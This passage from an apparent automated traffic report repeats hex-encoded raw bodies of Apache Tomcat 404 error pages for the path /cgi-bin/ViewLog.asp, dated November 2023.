63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:46 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:44 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:46 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:48 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:44 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:46 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 